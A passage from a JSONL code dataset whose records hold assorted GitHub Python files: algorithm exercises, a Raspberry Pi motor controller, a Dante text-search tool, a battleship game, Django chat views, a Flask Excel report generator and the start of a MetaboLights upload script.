experimentData.nConnectedInputs)))\n\n # auxText.append(\"\\nBit Histories\")\n # auxText.append(pprint.pformat(experimentData[\"bitHistories\"]))\n\n\n return '\\n'.join(auxText)\n","repo_name":"rhyolight/nupic.cerebro","sub_path":"experiment_runner.py","file_name":"experiment_runner.py","file_ext":"py","file_size_in_byte":8919,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"73723638199","text":"def inorder(X):\n\n global res\n if X <= N and TREE[X] != 0:\n if X*2<=N:\n inorder(X*2)\n res += TREE[X]\n if X*2<=N:\n inorder(X*2+1)\n\n\nfor tc in range(1,11):\n N = int(input())\n TREE = [0]*(N+1)\n for i in range(N):\n li = input().split()\n node, V = int(li[0]), li[1]\n TREE[node] = V\n res = ''\n inorder(1)\n\n print(f'#{tc} {res}')","repo_name":"hhhhjjj11/TIL","sub_path":"알고시간/2월 22일/중위순회.py","file_name":"중위순회.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7280945915","text":"import gui\nimport RPi.GPIO as GPIO\nimport threading\nimport time\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n\nbutton_pin = 20\nmotor_pin_1 = 13\nmotor_pin_2 = 14\nled_pin = 24\nGPIO.setup(button_pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(motor_pin_1, GPIO.OUT)\nGPIO.setup(motor_pin_2, GPIO.OUT)\nGPIO.setup(led_pin, GPIO.OUT)\n\nclosed = False\ndef on_close():\n global closed\n closed = True\n GPIO.output(motor_pin_1, False)\n GPIO.output(motor_pin_2, False)\n\ndef on_power_button_click():\n threading.Thread(target=pulse_led, args=[]).start()\n\n#...\ndef pulse_led():\n while window.powerButton.isChecked() and not closed:\n t = window.periodSpinBox.value() / 2\n GPIO.output(led_pin, True)\n window.virtualLED.setChecked(True) # Turn on virtual LED\n time.sleep(t)\n GPIO.output(led_pin, False)\n window.virtualLED.setChecked(False) # Turn off virtual LED\n time.sleep(t)\n#...\n\nwindow = gui.create(\"motor_control4.ui\", on_close)\nwindow.connect_event(window.powerButton.clicked, target=on_power_button_click, args=[])\nwindow.show()\n\ntoggled = False\nprevious_state = False\nwhile not closed:\n state = GPIO.input(button_pin)\n if (previous_state == False and state == True):\n toggled = not toggled\n if toggled:\n window.directionLabel.setText(\"Clockwise\")\n else:\n window.directionLabel.setText(\"Counter-Clockwise\")\n if window.powerButton.isChecked():\n if not toggled:\n GPIO.output(motor_pin_1, False)\n GPIO.output(motor_pin_2, True)\n else:\n GPIO.output(motor_pin_1, True)\n GPIO.output(motor_pin_2, False)\n else:\n GPIO.output(motor_pin_1, False)\n GPIO.output(motor_pin_2, False)\n previous_state = state\n window.update()\n time.sleep(0.01)","repo_name":"geneva-egr101/coding-resources","sub_path":"Tutorial2/11_virtual_led.py","file_name":"11_virtual_led.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14543216919","text":"import re\r\nimport json\r\nimport unidecode\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import RegexpTokenizer\r\nfrom gensim import models\r\nfrom gensim.corpora import Dictionary\r\nfrom gensim import similarities\r\n\r\ndef load_data(file_name):\r\n index = {}\r\n with open (file_name, \"r\", encoding=\"utf8\") as BigFile:\r\n titolo_canto = ''\r\n num_terzina = 0\r\n verso_terzina = 0\r\n for line in BigFile.readlines():\r\n line = unidecode.unidecode(line)\r\n if re.search(\"^\\w+\\s.\\sCanto\\s\\w+$\",line):\r\n line = line.strip()\r\n index[line] = {}\r\n titolo_canto = line\r\n num_terzina = 0\r\n verso_terzina = 0\r\n elif line == '\\n':\r\n continue\r\n else:\r\n k_terzina = str(num_terzina)\r\n k_verso = str(verso_terzina)\r\n if verso_terzina == 0:\r\n index[titolo_canto][k_terzina] = {}\r\n index[titolo_canto][k_terzina][k_verso] = line.strip('\\n')\r\n if verso_terzina == 2:\r\n verso_terzina = 0\r\n num_terzina += 1\r\n else:\r\n verso_terzina += 1\r\n\r\n a_file = open(\"./divina_commedia.json\", \"w\")\r\n json.dump(index, a_file)\r\n a_file.close()\r\n\r\n #print(\"Total Number of Documents:\",len(documents_list))\r\n #print(\"Titles are:\")\r\n #for t in titles:\r\n # print(t)\r\n return index\r\n\r\ndef titles_json(doc_set):\r\n\r\n titles = list()\r\n for canto in doc_set:\r\n for terzina in doc_set[canto]:\r\n t = canto+'_'+terzina\r\n titles.append(t)\r\n return titles\r\n\r\ndef preprocess_data(doc_set):\r\n\r\n tokenizer = RegexpTokenizer(r'\\w+')\r\n ita_stops = set(stopwords.words('italian'))\r\n ita_stemmer = nltk.stem.snowball.ItalianStemmer()\r\n texts = list()\r\n for canto in doc_set:\r\n for terzina in doc_set[canto]:\r\n bow = list()\r\n for verso in doc_set[canto][terzina]:\r\n raw = doc_set[canto][terzina][verso].lower()\r\n tokens = tokenizer.tokenize(raw)\r\n stopped_tokens = [i for i in tokens if not i in ita_stops]\r\n stemmed_tokens = [ita_stemmer.stem(i) for i in stopped_tokens]\r\n bow.extend(stemmed_tokens)\r\n texts.append(bow)\r\n return texts\r\n\r\ndef prepare_corpus(doc_clean):\r\n dictionary = Dictionary(doc_clean)\r\n doc_term_matrix = [dictionary.doc2bow(doc) for doc in doc_clean]\r\n return dictionary,doc_term_matrix\r\n\r\ndef prepare_query(query,dictionary):\r\n \r\n tokenizer = RegexpTokenizer(r'\\w+')\r\n ita_stops = set(stopwords.words('italian'))\r\n ita_stemmer = nltk.stem.snowball.ItalianStemmer()\r\n query = unidecode.unidecode(query)\r\n raw = query.lower()\r\n tokens = tokenizer.tokenize(raw)\r\n stopped_tokens = [i for i in tokens if not i in ita_stops]\r\n final = [ita_stemmer.stem(i) for i in stopped_tokens]\r\n vec_bow = dictionary.doc2bow(final)\r\n return vec_bow\r\n\r\ndef find_terzina(title,index):\r\n canto, terzina = tuple(title.split(\"_\"))\r\n output = ''\r\n for key in index[canto][terzina]:\r\n output += index[canto][terzina][key]+'\\n'\r\n return output\r\n\r\ndef create_model(doc_term_matrix):\r\n return TfidfModel(doc_term_matrix)\r\n\r\ndef create_sim_mtrx(corpus_tfidf):\r\n return similarities.MatrixSimilarity(corpus_tfidf) \r\n\r\nif __name__ == '__main__':\r\n try:\r\n with open(\"divina_commedia.json\",\"r\") as f_index:\r\n index = json.load(f_index)\r\n except IOError:\r\n index = load_data('divina_commedia.txt')\r\n data = preprocess_data(index)\r\n titles = titles_json(index)\r\n dictionary,doc_term_matrix = prepare_corpus(data)\r\n model = models.TfidfModel(doc_term_matrix)\r\n corpus_tfidf = model[doc_term_matrix]\r\n similarity_mtrx = similarities.MatrixSimilarity(corpus_tfidf) \r\n while True:\r\n query = input(\"What do you want to look for today?\\n\")\r\n if(not query):\r\n break\r\n print(\"\\nYour query:\")\r\n print(query+'\\n')\r\n query = prepare_query(query,dictionary)\r\n vec_tdidf = model[query]\r\n res_query = similarity_mtrx[vec_tdidf]\r\n res_query = sorted(enumerate(res_query), key = lambda item: -item[1])\r\n i = 0\r\n for doc_position, doc_score in res_query:\r\n if i < 5:\r\n print(doc_score)\r\n print(titles[doc_position])\r\n print(find_terzina(titles[doc_position],index))\r\n i += 1\r\n\r\n \r\n \r\n\r\n \r\n ","repo_name":"socratesgit/dante-text-processing","sub_path":"caronte.py","file_name":"caronte.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42843101076","text":"n, c = map(int, input().split())\narray = []\nfor i in range(n):\n array.append(int(input()))\narray.sort()\n\n\nstart = 1\nend = array[-1]-array[0]\n\nresult = (start + end) // 2\nwhile start <= end:\n mid = (start + end) // 2\n\n #공유기 몇 개 설치 가능한지\n count = 1\n prev = array[0]\n for i in range(1, n):\n if array[i] >= prev + mid:\n prev = array[i]\n count += 1\n\n if count < c:\n end = mid - 1\n else:\n result = mid\n start = mid + 1\n\nprint(result)","repo_name":"summerlight636/Algorithm","sub_path":"이코테 기출문제/이진탐색/29_공유기 설치.py","file_name":"29_공유기 설치.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22697911662","text":"from random import randint\r\n\r\n#KLASA DO PRZECHOWYWANIA WSPÓŁRZĘDNYCH (X,Y)\r\nclass Coords:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n\r\n def __eq__(self, other):\r\n return self.x == other.x and self.y == other.y\r\n\r\n def __repr__(self):\r\n return f\"({self.x}, {self.y})\"\r\n\r\n#OBSŁUGA WYJĄTKÓW\r\nclass OutOfBoardException(Exception):\r\n def __str__(self):\r\n return \"Próbujesz strzelać poza plansze!\"\r\n\r\n\r\nclass BoardUsedException(Exception):\r\n def __str__(self):\r\n return \"Już zastrzeliłeś tą kratkę\"\r\n\r\nclass BoardWrongShipException(Exception):\r\n pass\r\n\r\n#KLASA STATEK\r\nclass Ship:\r\n def __init__(self, kratka, maszty, orientacja):\r\n self.kratka = kratka\r\n self.maszty = maszty\r\n self.orientacja = orientacja\r\n self.doOdstrzalu = maszty\r\n\r\n#FUNCKJA ZWRACAJĄCA KRATKI STATKU\r\n @property\r\n def statekPlynie(self):\r\n wspolStatku = [] #lista wspolrzednych statku\r\n for i in range(self.maszty):\r\n wspolX = self.kratka.x\r\n wspolY = self.kratka.y\r\n if self.orientacja == 0: #ustawienie statku zorientowanego poziomo\r\n wspolX += i\r\n elif self.orientacja == 1: #ustawienie statku zorientowanego pionowo\r\n wspolY += i\r\n wspolStatku.append(Coords(wspolX, wspolY))\r\n return wspolStatku\r\n\r\n'''----------KLASA POLA DO GRY-----------'''\r\nclass Board:\r\n#DEKLARACJA ROZGRYWKI\r\n def __init__(self, hid=False, size=10):\r\n self.size = size #rozmiar\r\n self.hid = hid #plansza ze statkami ukryta przed graczem\r\n self.count = 0 #licznik zatopionych statków\r\n self.pole = [[\" \"] * size for _ in range(size)] #wypełnienie pola gry\r\n self.busy = [] #zajęte kratki\r\n self.ships = [] #lista statków\r\n\r\n#FUNKCJA DODAJĄCA STATEK\r\n def add_ship(self, ship):\r\n for d in ship.statekPlynie:\r\n if self.out(d) or d in self.busy: #warunek: statek poza polem gry lub statek na zajętym polu\r\n raise BoardWrongShipException()\r\n for d in ship.statekPlynie:\r\n self.pole[d.x][d.y] = \"■\" #oznaczenie statku na kratce\r\n self.busy.append(d) #oznaczenie kratki d jako zajętej\r\n\r\n self.ships.append(ship) #dodanie utworzonego statku do listy statków\r\n self.contour(ship) #obrysowanie pól graniczących ze statkiem\r\n\r\n#FUNKCJA NIEPOZWALAJĄCA NA STYKANIE SIĘ STATKÓW BOKAMI I ROGAMI\r\n def contour(self, ship, verb=False):\r\n near = [\r\n (-1, -1), (-1, 0), (-1, 1),\r\n (0, -1), (0, 0), (0, 1),\r\n (1, -1), (1, 0), (1, 1)\r\n ]\r\n for d in ship.statekPlynie:\r\n for dx, dy in near:\r\n cur = Coords(d.x + dx, d.y + dy)\r\n if not (self.out(cur)) and cur not in self.busy:\r\n self.busy.append(cur)\r\n\r\n#FUNCKCJA WYŚWIETLENIA POLA GRY\r\n def __str__(self):\r\n wiersz = \" | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10|\"\r\n for i, row in enumerate(self.pole):\r\n wiersz += f\"\\n{i + 1} | \" + \" | \".join(row) + \" |\"\r\n if self.hid: #plansza dla gracza\r\n wiersz = wiersz.replace(\"■\", \" \") #zamiana pola oznaczonego statkiem jako pole niewiadome dla użytkownika\r\n return wiersz\r\n\r\n#FUNKCJA SPRAWDZAJĄCA CZY STATEK NIE BĘDZIE ZNAJDOWAŁ SIĘ POZA POLEM GRY\r\n def out(self, kratka):\r\n return not ((0 <= kratka.x < self.size) and (0 <= kratka.y < self.size))\r\n\r\n#FUNKCJA DO STRZELANIA W STATEK\r\n def strzel(self, kratka):\r\n if self.out(kratka):\r\n raise OutOfBoardException()\r\n if kratka in self.busy:\r\n raise BoardUsedException()\r\n\r\n self.busy.append(kratka)\r\n for ship in self.ships:\r\n if kratka in ship.statekPlynie: #jesli na kratce znajduje sie maszt statku\r\n ship.doOdstrzalu -= 1 #-1 maszt statku\r\n self.pole[kratka.x][kratka.y] = \"X\" #oznacz kratke jako trafione\r\n if ship.doOdstrzalu == 0: #jesli maszt=0 => zniszczono caly statek\r\n self.count += 1 #licznik zniszczonych statkow +1\r\n self.contour(ship, verb=True)\r\n print(\"Statek jest zniszczony!\")\r\n return False\r\n else:\r\n print(\"Statek został trafiony!\")\r\n return True\r\n\r\n self.pole[kratka.x][kratka.y] = \"*\" #kratka sprawdzona, ale nietrafiona\r\n print(\"Pudło!\")\r\n return False\r\n\r\n def begin(self):\r\n self.busy = []\r\n\r\n'''------------KLASA GRACZA------------'''\r\nclass Player:\r\n def __init__(self, board):\r\n self.board = board\r\n#FUNKCJA DO WPROWADZENIA WSPOLRZEDNYCH PRZEZ GRACZA\r\n def wprowadzWspolrzedne(self):\r\n while True:\r\n cords = input(\"Twój ruch: \").split() #pobranie wspolrzednych z klawiatury\r\n if len(cords) != 2: #jesli gracz podal niepoprawna ilosc argumentow\r\n print(\"Musisz podac 2 wspolrzedne!\")\r\n continue\r\n x, y = cords\r\n if not (x.isdigit()) or not (y.isdigit()): #jesli gracz podal niepoprawne dane\r\n print(\"Wspolrzedne musza byc dodatnimi liczbami calkowitymi!\")\r\n continue\r\n return Coords(int(x) - 1, int(y) - 1) #zwrocenie formatu odpowiedniego dla tablic\r\n\r\n def wykonajRuch(self):\r\n while True:\r\n cel = self.wprowadzWspolrzedne()\r\n strzal = self.board.strzel(cel)\r\n return strzal\r\n\r\n\r\n'''--------------KLASA ROZGRYWKI--------------'''\r\nclass Game:\r\n def __init__(self, size=10):\r\n self.size = size\r\n plansza = self.rozmiescStatki()\r\n plansza.hid=True\r\n self.player = Player(plansza)\r\n#FUNKCJA GENERUJĄCA LOSOWE ROZMIESZCZENIE STATKÓW NA POLU GRY\r\n def rozmiescStatki(self):\r\n statki = [4, 3, 3, 2, 2, 2, 1, 1, 1, 1]\r\n board = Board(size=self.size)\r\n for statek in statki:\r\n while True:\r\n ship = Ship(Coords(randint(0, self.size), randint(0, self.size)), statek, randint(0, 1)) #generowanie statku\r\n try:\r\n board.add_ship(ship) #dodanie wygenerowanego statku na plansze\r\n break\r\n except:\r\n pass\r\n board.begin()\r\n return board\r\n#FUNKCJA ODPOWIADAJĄCA NA OBSŁUGĘ ROZGRYWKI\r\n def start(self):\r\n for ruch in range(30):\r\n print(\"-\" * 20)\r\n print(self.player.board)\r\n self.player.wykonajRuch()\r\n if self.player.board.count == 10: #wygrana w grze (liczba zastrzelonych statkow=0)\r\n print(\"***Wygrałeś!***\")\r\n return True\r\n print(\"Niestety przegrałeś\")\r\n#URUCHOMIENIE GRY\r\nGame().start()","repo_name":"ewakobrzynska/Battleship","sub_path":"GraWStatki/venv/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":6855,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6334765314","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\nfrom django.views.generic import CreateView\n\nfrom mainapp.forms import DialogMessageForm\nfrom mainapp.models import Dialog, DialogMemebers, Message\n\n\n@login_required\ndef index(request):\n dialogues = request.user.dialogs.select_related('dialog').all()\n context = {\n 'page_title': 'диалоги',\n 'dialogues': dialogues,\n }\n\n return render(request, 'mainapp/index.html', context)\n\n\ndef dialog_show(request, dialog_pk):\n dialog = get_object_or_404(Dialog, pk=dialog_pk)\n sender = dialog.get_sender(request.user.pk)\n\n context = {\n 'page_title': 'диалог',\n 'dialog': dialog,\n 'sender': sender,\n }\n\n return render(request, 'mainapp/dialog_show.html', context)\n\n\ndef dialog_create(request):\n dialogues = request.user.dialogs.select_related('dialog').all(). \\\n values_list('dialog_id', flat=True)\n interlocutors = DialogMemebers.objects.filter(dialog__in=dialogues). \\\n values_list('member_id', flat=True)\n new_interlocutors = User.objects.exclude(pk__in=interlocutors)\n\n context = {\n 'page_title': 'новый диалог',\n 'new_interlocutors': new_interlocutors,\n }\n return render(request, 'mainapp/dialog_create.html', context)\n\n\ndef user_dialog_create(request, user_id):\n interlocutor = User.objects.get(pk=user_id)\n dialog = Dialog.objects.create(\n name=interlocutor.username\n )\n DialogMemebers.objects.create(\n dialog=dialog,\n member=request.user,\n role=DialogMemebers.CREATOR\n )\n DialogMemebers.objects.create(\n dialog=dialog,\n # member_id=user_id,\n member=interlocutor,\n role=DialogMemebers.INTERLOCUTOR\n )\n\n return HttpResponseRedirect(\n reverse('main:dialog_show', kwargs={'dialog_pk': dialog.pk})\n )\n\n\n# CBV\ndef dialog_delete(request, pk):\n # instance = Dialog.objects.filter(pk=pk).first()\n instance = get_object_or_404(Dialog, pk=pk)\n instance.delete()\n return HttpResponseRedirect(reverse('main:index'))\n\n\n# def dialog_message_create(request):\nclass DialogMessageCreate(CreateView):\n model = Message\n form_class = DialogMessageForm\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n form = context['form']\n sender_pk = self.request.resolver_match.kwargs['sender_pk']\n # print(context)\n # print(form.fields['sender'].initial)\n # print(dir(form.fields['sender']))\n # print(sender_pk)\n # print(form.initial)\n # form.fields['sender'].initial = sender_pk\n form.initial['sender'] = sender_pk\n\n return context\n\n def get_success_url(self):\n # print(self.object.sender.dialog_id)\n # return reverse('main:index')\n return reverse(\n 'main:dialog_show',\n kwargs={'dialog_pk': self.object.sender.dialog_id}\n )\n\n\ndef dialog_new_messages(request, dialog_pk):\n if request.is_ajax():\n dialog = Dialog.objects.filter(pk=dialog_pk).first()\n status = False\n new_messages = None\n if dialog:\n status = True\n _new_messages = dialog.get_messages_new(request.user.pk)\n # _new_messages.update(read=True)\n new_messages = [\n {'pk': el.pk,\n 'username': el.sender.member.username,\n 'created': el.created.strftime('%Y.%m.%d %H:%M'),\n 'text': el.text}\n for el in _new_messages\n ]\n print(f'new messgaes {len(new_messages)}, read update')\n _new_messages.update(read=True)\n\n return JsonResponse({\n 'status': status,\n 'new_messages': new_messages,\n })\n","repo_name":"kurganITteacher/python-adv","sub_path":"210329/sources/kpk_messenger/mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"3595465615","text":"# -*- coding: utf-8 -*-\nfrom ..hum_tools_const import HumToolsConst\n\n\nclass Lang:\n ja_JP = 'ja_JP'\n en_US = 'en_US'\n\n @staticmethod\n def pack(_ja_JP, _en_US, select=None):\n \"\"\"日本語の文字列と英語の文字列をパックし、適切な言語の文字列を返す。\n\n Args:\n _ja_JP (str): 日本語の文字列。\n _en_US (str): 英語の文字列。\n select (str, optional): 返す言語を指定する。デフォルトはNone。\n\n Returns:\n str: Mayaを立ち上げた言語の文字列を返す。select引数で指定した場合は、指定した言語の文字列を返す。\n\n Note:\n Mayaを立ち上げた言語やselectで指定した言語が日本語や英語以外の場合は、英語になる。\n \"\"\"\n if select is None:\n lang = HumToolsConst.LANGUAGE\n else:\n lang = select\n\n if lang == Lang.ja_JP:\n return _ja_JP\n elif lang == Lang.en_US:\n return _en_US\n else:\n return _en_US","repo_name":"Hum9183/MayaHumTools","sub_path":"Contents/scripts/humtools/util/lang.py","file_name":"lang.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"ja","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"22262139731","text":"import sqlite3\nfrom transformers import pipeline\n\n# connect to SQLite database\nconn = sqlite3.connect('blog_posts.db')\nc = conn.cursor()\n\n# load pre-trained QAS model\nqas = pipeline(\"question-answering\", model=\"distilbert-base-cased-distilled-squad\")\n\n# define function to get answer to question\ndef get_answer(question):\n # execute SQL query to get data from database\n c.execute(\"SELECT reprocessed_text FROM blog_posts\")\n data = c.fetchall()\n\n # loop over data to find best answer\n best_answer = ''\n best_score = 0\n for text in data:\n # get answer to question using pre-trained QAS model\n answer = qas({'question': question, 'context': text[0]})\n score = answer['score']\n if score > best_score:\n best_score = score\n best_answer = answer['answer']\n return best_answer\n\n# example usage\nquestion = 'What is the purpose of this dataset?'\nanswer = get_answer(question)\nprint(answer)\n","repo_name":"ErizY/Question-answering-system-improvado-job-test","sub_path":"test question.py","file_name":"test question.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20634495964","text":"import pandas as pd\nfrom openpyxl import Workbook\nimport src.wrangler as wr\nfrom flask import Flask, render_template, request, send_file\nimport os\nimport src.constants as con\nimport shutil\nimport src.dataframe_helper as dh\nimport src.exceptions as e\n\napp = Flask(__name__)\n\n\ndef read_usps_report(usps_file, hcde_file, misc_file, buyboard_file, pca_file, friendswood_file, month, year):\n usps_fmd_df = e.read_excel_with_exception(f'{usps_file}', sheet_name=f'{year} LTD (FMD)')\n hdce_df = e.read_excel_with_exception(f'{hcde_file}', sheet_name=f'{year}')\n llc_df = e.read_excel_with_exception(f'{usps_file}', sheet_name=f'{year} FMD - DPFS LLC')\n misc_df = e.read_excel_with_exception(f'{misc_file}', sheet_name=f'{year}')\n buyboard_df = e.read_excel_with_exception(f'{buyboard_file}', sheet_name=f'{year}')\n pca_df = e.read_excel_with_exception(f'{pca_file}', sheet_name=f'{year}')\n friendswood_df = e.read_excel_with_exception(f'{friendswood_file}', sheet_name=f'{year}')\n\n wb = Workbook()\n\n # Create FS Paid\n wr.create_fs_sheet(usps_df=usps_fmd_df, hcde_df=hdce_df, misc_df=misc_df, buyboard_df=buyboard_df,\n pca_df=pca_df, friendswood_df=friendswood_df, wb=wb, month=month, year=year, fs_type='Paid',\n df_creation_func=dh.create_paid_df, last_row_columns=con.FS_PAID_LAST_ROW_COLS,\n columns_to_exclude_from_generic_styles=con.FS_PAID_COLS_TO_EXCLUDE)\n\n # Create FS Outstanding\n wr.create_fs_sheet(usps_df=usps_fmd_df, hcde_df=hdce_df, misc_df=misc_df, buyboard_df=buyboard_df,\n pca_df=pca_df, friendswood_df=friendswood_df, wb=wb, month=month, year=year,\n fs_type='Outstanding', df_creation_func=dh.create_outstanding_df,\n last_row_columns=con.FS_OUTSTANDING_LAST_ROW_COLS,\n columns_to_exclude_from_generic_styles=con.FS_OUTSTANDING_COLS_TO_EXCLUDE)\n\n # Create FS WIP\n wr.create_fs_sheet(usps_df=usps_fmd_df, hcde_df=hdce_df, misc_df=misc_df, buyboard_df=buyboard_df,\n pca_df=pca_df, friendswood_df=friendswood_df, wb=wb, month=month, year=year, fs_type='WIP',\n df_creation_func=dh.create_wip_df, last_row_columns=con.FS_WIP_LAST_ROW_COLS,\n columns_to_exclude_from_generic_styles=con.FS_WIP_COLS_TO_EXCLUDE)\n\n # Create LLC Paid\n wr.create_llc_sheet(llc_df, wb, llc_type='Paid', last_row_cols=con.LLC_PAID_LAST_ROW_COLS,\n cols_to_exclude=con.LLC_PAID_COLS_TO_EXCLUDE, month=month, year=year)\n\n # Create LLC Outstanding\n wr.create_llc_sheet(llc_df, wb, llc_type='Outstanding', last_row_cols=con.LLC_OUTSTANDING_LAST_ROW_COLS,\n cols_to_exclude=con.LLC_OUTSTANDING_COLS_TO_EXCLUDE, month=month, year=year)\n\n # Create LLC WIP\n wr.create_llc_sheet(llc_df, wb, llc_type='WIP', last_row_cols=con.LLC_WIP_LAST_ROW_COLS,\n cols_to_exclude=con.LLC_WIP_COLS_TO_EXCLUDE, month=month, year=year)\n\n wb.remove_sheet(wb.get_sheet_by_name('Sheet'))\n\n return wb\n\n\n@app.route('/')\ndef index():\n return render_template('index.html', month_options=con.MONTH_OPTIONS)\n\n\n@app.route('/process', methods=['POST'])\ndef process_spreadsheets():\n year = request.form['year']\n month = request.form['month']\n uploaded_files = request.files.getlist('spreadsheets')\n\n upload_dir = 'uploads'\n\n # Check if the upload directory exists and delete its contents if it does\n if os.path.exists(upload_dir):\n for file in os.listdir(upload_dir):\n file_path = os.path.join(upload_dir, file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print(f\"Error deleting {file_path}: {e}\")\n\n os.makedirs(upload_dir, exist_ok=True)\n\n usps_file = ''\n hcde_file = ''\n misc_file = ''\n buyboard_file = ''\n pca_file = ''\n friendswood_file = ''\n\n for uploaded_file in uploaded_files:\n if uploaded_file.filename != '':\n if 'USPS' in uploaded_file.filename:\n file_path = os.path.join('uploads', uploaded_file.filename)\n uploaded_file.save(file_path)\n usps_file = file_path\n elif 'HCDE' in uploaded_file.filename:\n file_path = os.path.join('uploads', uploaded_file.filename)\n uploaded_file.save(file_path)\n hcde_file = file_path\n elif 'MISC' in uploaded_file.filename:\n file_path = os.path.join('uploads', uploaded_file.filename)\n uploaded_file.save(file_path)\n misc_file = file_path\n elif 'BuyBoard' in uploaded_file.filename:\n file_path = os.path.join('uploads', uploaded_file.filename)\n uploaded_file.save(file_path)\n buyboard_file = file_path\n elif 'PCA' in uploaded_file.filename:\n file_path = os.path.join('uploads', uploaded_file.filename)\n uploaded_file.save(file_path)\n pca_file = file_path\n elif 'Friendswood' in uploaded_file.filename:\n file_path = os.path.join('uploads', uploaded_file.filename)\n uploaded_file.save(file_path)\n friendswood_file = file_path\n else:\n alert_message = f'Unknown file uploaded: {uploaded_file.filename}'\n return f\"\"\n\n if (usps_file == '' or hcde_file == '' or misc_file == '' or pca_file == '' or buyboard_file == '' or\n friendswood_file == ''):\n alert_message = f'Missing one or more files to create the WIP file'\n return f\"\"\n\n try:\n wb = read_usps_report(usps_file=usps_file, hcde_file=hcde_file, friendswood_file=friendswood_file, year=year,\n misc_file=misc_file, pca_file=pca_file, buyboard_file=buyboard_file, month=month)\n except Exception as ex:\n return f\"\"\n\n results_file = f'uploads/{con.MONTH_TO_ZERO_PADDED_NUMBER[month]}-{year} WIP.xlsx'\n wb.save(results_file)\n\n return send_file(results_file, as_attachment=True)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"bpolasek519/tracy_monthly_report","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72800340919","text":"#!/usr/bin/env python\n\n\"\"\"\nPython script to upload project folders/files to MetaboLights Labs Projects\n\nThird party dependency: IMPORTANT!!!\nREMEMBER TO INSTALL ASPERA CONNECT When USING MTBLS UPLOADER\n\nDependencies:\n os, sys, argparse, json, requests, subprocess\n\nUsage:\n python uploadToMetaboLightsLabs.py -t -i [ ] -p -n -s \n or\n uploadToMetaboLightsLabs.py -t -i [ ] -p -n -s \n\nArguments:\n -t MetaboLights Labs API_KEY\n -i pathToFile1, pathToFile2, . . ., pathToFileN\n -p MetaboLights Labs Project ID\n -n Create new project if project doesnt exist\n -s server [ \"prod\", \"dev\", \"test\" ]\n\"\"\"\n\nimport argparse\nimport ast\nimport glob\nimport json\nimport logging\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nimport zipfile\n\nimport requests\n\napi_token = None\ndirectories = []\nfiles = []\nproject_id = None\nnew_project_flag = False\nlog_file = \"cli.log\"\nenv = \"dev\"\nservers = [\"prod\", \"dev\", \"test\"]\nserverPortDictionary = {\n \"prod\": {\n \"server\": \"http://www.ebi.ac.uk/metabolights/\",\n \"port\": \"\"\n },\n \"dev\": {\n \"server\": \"http://wwwdev.ebi.ac.uk/metabolights/\",\n \"port\": \"\"\n },\n \"test\": {\n \"server\": \"http://localhost.ebi.ac.uk:8080/metabolights/\",\n \"port\": \"\"\n }\n}\ntmpdir = \"\"\n\n\ndef main(arguments):\n logging.basicConfig(filename=log_file, level=logging.DEBUG)\n usage = \"\"\"\n python uploadToMetaboLightsLabs.py -t --i [ ] -p -n -s \n or\n uploadToMetaboLightsLabs.py -t --i [ ] -p -n -s \n or\n python uploadToMetaboLightsLabs.py -t --I --v -p -n -s \n or\n uploadToMetaboLightsLabs.py -t --I --v -p -n -s \nArguments:\n -t MetaboLights Labs API_KEY\n\n --i pathToFile1, pathToFile2, . . ., pathToFileN\n or\n --I pathToIsaTabfolder\n --v pathToValidationReportJSON\n\n -p MetaboLights Labs Project ID\n -n Create new project if project doesnt exist\n -s server [ \"prod\", \"dev\", \"test\" ]\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n usage=usage)\n parser.add_argument('-t', required=True, help='MetaboLights API Key')\n parser.add_argument('--i', required=False, nargs='+',\n help=\"Input folder(s)/file(s)\")\n parser.add_argument('--I', required=False,\n help=\"Input folder containing ISA-Tab, raw, and maf files\")\n parser.add_argument('--v', required=False,\n help=\"Validation report in JSON format\")\n parser.add_argument('-p', help='MetaboLights Labs Project ID')\n parser.add_argument('-n',\n help='Create new MetaboLights Labs Project if doesnt exist',\n action='store_true')\n parser.add_argument('-s', help='Server details. Allowed values are '.join(\n servers), choices=servers)\n args = parser.parse_args(arguments)\n # parser.print_help()\n logging.info(\"Validating Input Parameters\")\n # validating input\n if parseInput(args):\n # Input validation success\n logging.info(\"Input validation Success\")\n # Request MetaboLights Labs webservice for aspera upload 